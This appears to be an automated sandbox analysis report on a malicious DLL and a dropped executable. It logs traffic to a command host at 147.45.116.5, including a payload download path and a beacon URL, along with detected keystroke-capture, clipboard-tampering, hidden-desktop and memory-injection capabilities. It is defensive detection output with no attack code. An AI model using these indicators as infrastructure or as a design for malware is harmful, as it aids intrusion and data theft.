Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.116.5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C829F50 recv,WSAGetLastError,

12_2_6C829F50

Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /FANTASMA/0101.zip HTTP/1.1accept: /host: 147.45.116.5
Source: global traffic	HTTP traffic detected: GET /index.php?user-PC HTTP/1.1accept: /host: 147.45.116.5

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 21:24:27 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 274Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 31 31 36 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at 147.45.116.5 Port 80</address></body></html>

Source: rundll32.exe, rundll32.exe, 0000000C.00000002.1908516008.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll	String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zip
Source: rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/FANTASMA/0101.zipc
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/index.php
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1961701319.000000000303A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/index.php?user-PC
Source: rundll32.exe, 0000000C.00000002.1907739906.00000000030FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.116.5/index.phpxU_
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://code.google.com/p/swfobject/
Source: rundll32.exe, 0000000C.00000002.1907873298.000000000316D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA.crl0q
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://dev.w3.org/html5/websockets/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://fontawesome.io
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://gimite.net/en/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://javascript.crockford.com/jsmin.html
Source: rundll32.exe, 0000000C.00000002.1907873298.000000000316D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0&
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6455
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.embarcadero.com/products/delphi
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.esegece.com
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000001C.00000002.2653315436.00000000029BE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2124550236.0000000002A0E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.foolabs.com/xpdf
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ghisler.com/plugins.htm
Source: ybtrrus.exe, 0000001C.00000002.2657419183.0000000006B57000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000001C.00000002.2691639077.00000000077AC000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2657987949.0000000006C67000.00000020.00000001.01000000.0000000D.sdmp, ybtrrus.exe, 00000021.00000002.2693218645.000000000777C000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2126788889.000000000661F000.00000020.00000001.01000000.00000009.sdmp, ybtrrus.exe, 0000002F.00000003.2048238374.000000000779C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: rundll32.exe, 0000000C.00000003.1881319232.000000000316E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1934897398.0000000004D87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com.
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp, ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2123620807.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000003.1998212742.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.php(E~
Source: ybtrrus.exe, 00000021.00000003.1963237274.0000000000E87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/bugRepMailer.phpiE
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%d
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/buynow?bld=%dS
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/checkupdates.php?product=bc3&minor=
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.php
Source: ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/download.phpS
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/support.php
Source: ybtrrus.exe, 00000021.00000002.2653795251.0000000002BA3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002AA3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade0
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgrade6%
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradeeow.a
Source: ybtrrus.exe, 0000001C.00000002.2650636704.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2650668938.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.scootersoftware.com/upgradeite
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.scootersoftware.com/v3formats
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002AA3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002BA3000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 0000002F.00000002.2124550236.0000000002B10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.secureblackbox.com
Source: ybtrrus.exe, 0000002F.00000002.2124550236.0000000002B10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.secureblackbox.com1)
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.totalcmd.net/directory/packer.html
Source: rundll32.exe, 00000013.00000002.1962876857.000000006C85D000.00000002.00000001.01000000.00000003.sdmp, T8TY28UxiT.dll	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://fontawesome.com
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://fontawesome.com/license/free
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/Yaffle/EventSource/
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/muaz-khan/RTCMultiConnection/issues/778#issuecomment-524853468
Source: ybtrrus.exe, 0000002F.00000002.2181132613.0000000006E3F000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://github.com/muaz-khan/RecordRTC

Contains functionality for read data from the clipboard

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468CD6 OpenClipboard,

28_2_05468CD6

Contains functionality to modify clipboard data

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468DF6 SetClipboardData,

28_2_05468DF6

Contains functionality to read the clipboard data

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468956 GetClipboardData,

28_2_05468956

Contains functionality to retrieve information about pressed keystrokes

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_05468926 GetAsyncKeyState,

28_2_05468926

Source: C:\iDQiPwFWUp\ybtrrus.exe

Code function: 28_2_054687C6 CreateDesktopW,

28_2_054687C6

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Windows\System32\loaddll32.exe	Memory allocated: 76D80000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 775A0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C832910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	12_2_6C832910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F4430 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError,	12_2_6C7F4430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8327F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	12_2_6C8327F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C828701 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,	12_2_6C828701
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F5E50 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F5E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F7920 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F7920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F3B50 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F3B50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7F72C0 NtCancelIoFileEx,RtlNtStatusToDosError,	12_2_6C7F72C0

Contains functionality to communicate with device drivers

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C7F4430: NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,NtCancelIoFileEx,RtlNtStatusToDosError,RtlNtStatusToDosError,

12_2_6C7F4430

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6C45F6	12_2_6C6C45F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6927E0	12_2_6C6927E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C833DBB	12_2_6C833DBB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6979E0	12_2_6C6979E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A3B80	12_2_6C6A3B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C699600	12_2_6C699600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6933D2	12_2_6C6933D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8CC0	12_2_6C6A8CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7D0D10	12_2_6C7D0D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818DF0	12_2_6C818DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C82CD50	12_2_6C82CD50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84CEF0	12_2_6C84CEF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C844E00	12_2_6C844E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8F10	12_2_6C6A8F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818880	12_2_6C818880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6AE800	12_2_6C6AE800
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8308F0	12_2_6C8308F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84C910	12_2_6C84C910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69C980	12_2_6C69C980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69EA50	12_2_6C69EA50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B0B40	12_2_6C6B0B40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818B70	12_2_6C818B70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C858470	12_2_6C858470
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C85A590	12_2_6C85A590
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8550	12_2_6C6A8550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6E0500	12_2_6C6E0500
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C82A511	12_2_6C82A511
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C82E51E	12_2_6C82E51E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7765A0	12_2_6C7765A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C69C630	12_2_6C69C630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7C4600	12_2_6C7C4600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80C610	12_2_6C80C610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B06C0	12_2_6C6B06C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8507C0	12_2_6C8507C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8467E0	12_2_6C8467E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A8710	12_2_6C6A8710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C85C0E0	12_2_6C85C0E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7840F0	12_2_6C7840F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80A180	12_2_6C80A180
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6E0140	12_2_6C6E0140
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7481A0	12_2_6C7481A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7DC190	12_2_6C7DC190
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80C170	12_2_6C80C170
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C71A216	12_2_6C71A216
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E2210	12_2_6C7E2210
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B02E0	12_2_6C6B02E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C818220	12_2_6C818220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C850240	12_2_6C850240
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C84A3A0	12_2_6C84A3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C747C60	12_2_6C747C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C847C91	12_2_6C847C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C83BC40	12_2_6C83BC40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E9CB0	12_2_6C7E9CB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C781D60	12_2_6C781D60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E7DB0	12_2_6C7E7DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E3E60	12_2_6C7E3E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6DFE20	12_2_6C6DFE20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C80BE00	12_2_6C80BE00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C857E00	12_2_6C857E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6B7F40	12_2_6C6B7F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C855FC0	12_2_6C855FC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C747F00	12_2_6C747F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A9F80	12_2_6C6A9F80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C817880	12_2_6C817880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7A1830	12_2_6C7A1830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C8578F0	12_2_6C8578F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C7E78D0	12_2_6C7E78D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6A7920	12_2_6C6A7920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C6AB910	12_2_6C6AB910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_6C799AD0	12_2_6C799AD0
